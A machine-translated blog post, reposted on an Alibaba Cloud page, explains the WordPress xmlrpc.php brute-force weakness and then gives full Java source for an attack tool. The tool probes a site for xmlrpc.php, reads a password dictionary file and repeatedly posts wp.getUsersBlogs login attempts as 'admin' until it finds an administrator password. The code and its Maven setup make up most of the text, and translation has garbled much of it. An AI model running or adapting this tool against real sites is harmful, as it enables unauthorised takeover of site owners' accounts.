Wordpress xmlrpc.php brute force hack vulnerability

Source: Internet
Author: User

Wordpress xmlrpc.php brute force hack vulnerability

WordPress is a very popular open source blog, it provides a way to publish articles remotely, is the use of xmlrpc.php with the path of this file, the recent outbreak of xmlrpc loopholes, the vulnerability principle is through XMLRPC authentication, even if the authentication failed, Also will not be installed by the WordPress security plug-in record, so will not trigger the password error n times is locked in the case. As a result, it can be violently cracked, and if the password is a weak password, it is quite dangerous. The simplest solution is to delete the xmlrpc.php file. Idle to Nothing, with Java write a brute force hack script, in fact, is holding a variety of usernames, passwords to constantly call xmlrpc.phpp This file, detection certification results, very simple. Only for entertainment, violence to crack things, everyone cautious.

Xmlrpc.java source code is as follows:

    package com.yeetrack.security.wordpress;    import  org.apache.http.client.clientprotocolexception;    import  org.apache.http.client.config.requestconfig;    import  org.apache.http.client.methods.closeablehttpresponse;    import  org.apache.http.client.methods.httpget;    import  org.apache.http.client.methods.httppost;    import  org.apache.http.entity.stringentity;    import  org.apache.http.impl.client.closeablehttpclient;    import  org.apache.http.impl.client.httpclients;    import org.apache.http.util.entityutils;     import org.slf4j.Logger;    import  org.slf4j.loggerfactory;    import org.testng.annotations.test;     import java.io.*;&nbsP;   /**     * created by victor wang on  2014/8/2.     *  exploit Wordpress xmlrpc vulnerability, brute force password       */    public class Xmlrpc    {         private String userAgent =  "mozilla/5.0  (windows nt  6.1; wow64; rv:31.0)  gecko/20100101 firefox/31.0 ";         requestconfig requestconfig = requestconfig.custom (). Setconnectionrequesttimeout (4000). Setconnecttimeout (4000)                  .setsockettimeout (4000). Build ();         private static logger logger = loggerfactory.getlogger (Xmlrpc.class );         privaTe closeablehttpclient httpclient = httpclients.custom ()                  .setuseragent (userAgent)                  .setdefaultrequestconfig ( Requestconfig)                  . Build ();        /**          *  Verify that the domain name exists xmlrpc.php this file          */         private boolean checkxmlrpcfile (String domain)          {            domain  = wrapperurl (domain);             if ( Domain==null)                 return false;             httpget get = new httpget (" HTTP//"+domain+"/xmlrpc.php ");             Get.addheader ("User-agent",  useragent);             CloseableHttpResponse response = null;             String resultString = null;             try {                 response = httpclient.execute (GET);                 if (null == response | |  response.equals (""))                      return  false;                 Resultstring = entityutils.tostring (Response.getentity ());             } catch  (ioexception e)  {                 e.printstacktrace ();             }             return resultstring.contains ("xml-rpc server accepts post requests  Only. ");         }        /**          *  Violent attempts           */         private boolean forcelogin (string username, string  password, string url)         {             //trying to sign in              httppost post = new httppost ("http://" +wrapperurl (URL) + "/xmlrpc.php");             post.addheader ("User-Agent",  useragent);            string xmlstring  =  "<?xml version=\" 1.0\ " encoding=\" iso-8859-1\ "?><methodcall>  < methodname>wp.getusersblogs</methodname>  <params>   <param>< Value> "+username+" </value></param>   <param><value> "+password+" </ Value></param>&nbSp; </params></methodcall> ";             StringEntity entity = null;             try {                 entity = new stringentity (xmlstring);                 post.setentity (Entity);                 closeablehttpresponse response  = httpclient.execute (POST);                 string loginresult = entityutils.tostring (Response.getEntity ());                 if (null==  loginresult | |  loginresult.Equals (""))                      return false;                 if (Loginresult.contains ("ISAdmin"))  {                     logger.info (url +   "Login successful, Userename--->  + username + "   password---> " +  Password);                     return true;                 }            }  catch  (unsupportedencodingexception e)  {               &nbsP; e.printstacktrace ();            }  catch  (clientprotocolexception e)  {                 e.printstacktrace ();             } catch  (ioexception e)  {                 e.printstacktrace ();             }             return false;        }         /**         *  clean URL, remove HTTP///or End of path          */        private  String wrapperurl (String url)         {             if (null == url | |  url.equals (""))                  return null;            if ( Url.startswith ("http.//"))                  url = url.substring (7);             if (Url.contains ("/"))                  url = url.substring (0, url.indexof ("/"));             return url;        }         /**         *  hack          */          @Test         public void test ()          {             String url =  "http://somewordpress.com/xmlrpc.php";             if (!checkxmlrpcfile (URL))  {                 logger.info (url+ "---> No xmlrpc vulnerability");                 return;             }             file file = new file ("Src/main/resources/1pass00.txt");  //cipher dictionaries, a bunch of these online, Or you can build it yourself or   & it.nbsp;         try {                 FileReader fileReader = new  FileReader (file);                 bufferedreader bufferedreader = new bufferedreader (FileReader);                 String line =  null;                int  count = 1;                 while  ((Line = bufferedreader.readline ())  != null)  {                      System.out.println (""  + count +  "  "  + line);                     if (Forcelogin ("admin",  line, url))                           break;                     count++;                     //thread.sleep (+);                 }             } catch  (exception e)  { e.printstacktrace ();  }        }    }

The project uses MAVEN management, using Apache's httpclient and log4j, and thepom.xml code is as follows:

<?xml version= "1.0" encoding= "UTF-8"?> <project xmlns= "http://maven.apache.org/POM/4.0.0" Xmlns:xs I= "Http://www.w3.org/2001/XMLSchema-instance" xsi:schemalocation= "http://maven.apache.org/POM/4.0.0 Http://mav En.apache.org/xsd/maven-4.0.0.xsd "> <modelVersion>4.0.0</modelVersion> <groupid>com.yee Track.security</groupid> <artifactId>wordpress-xmlrpc</artifactId> <version>1.0-snap Shot</version>

Continue Reading-

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.